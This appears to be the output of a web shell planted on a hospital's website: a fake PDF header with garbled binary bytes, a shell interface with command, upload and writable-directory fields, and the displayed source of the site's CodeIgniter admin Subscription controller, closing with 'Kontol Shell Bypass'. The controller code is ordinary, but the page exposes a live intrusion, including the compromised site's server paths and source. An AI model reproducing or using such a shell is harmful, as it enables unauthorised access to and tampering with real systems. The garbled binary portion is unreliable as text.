%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/application/controllers/admin/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/application/controllers/admin/Subscription.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');

class Subscription extends CI_Controller {

	/**
	 * Index Page for this controller.
	 *
	 * Maps to the following URL
	 * 		http://example.com/index.php/welcome
	 *	- or -
	 * 		http://example.com/index.php/welcome/index
	 *	- or -
	 * Since this controller is set as the default controller in
	 * config/routes.php, it's displayed at http://example.com/
	 *
	 * So any other public methods not prefixed with an underscore will
	 * map to /index.php/welcome/<method_name>
	 * @see https://codeigniter.com/user_guide/general/urls.html
	 */
	function __construct() {
        parent::__construct();
        
        if((!isset($_SESSION['is_logged']))||($_SESSION['is_logged']==false))
        {
        	$_SESSION['redirect'] = base_url()."admin/Subscription/view_subscriptions";
        	
        	redirect(base_url().'admin/login');
        }

        //$this->load->model('subscription_model', 'subscription');
        $this->load->model('Common_Model');
    }
	
	public function index()
	{
		$this->view_subscriptions();
	}
	

		
	public function view_subscriptions($id=0)
	{
		
		$data = array();
		$data['records'] = $this->Common_Model->getCommonQuery('SH_Subscriptions');
			
		if(!$data){
			show_404();
		}
		
		$this->load->view('admin/ViewSubscriptions',$data);
	}
	
	
	public function remove_subscription($id)
	{
		
		$data = array();
		
		
		if($this->Common_Model->removeAllItems('SH_Subscriptions',$id,'SubscriptionID')){
			$data['msg'] = 'Subscription deleted succesfully';
		}
		else{
			$data['msg'] = 'Subscription could not be deleted';
		}
		
		$data['records'] = $this->Common_Model->getCommonQuery('SH_Subscriptions');
			
		if(!$data){
			show_404();
		}
				
		$this->load->view('admin/ViewSubscriptions',$data);
	}
	
	
	
}

Kontol Shell Bypass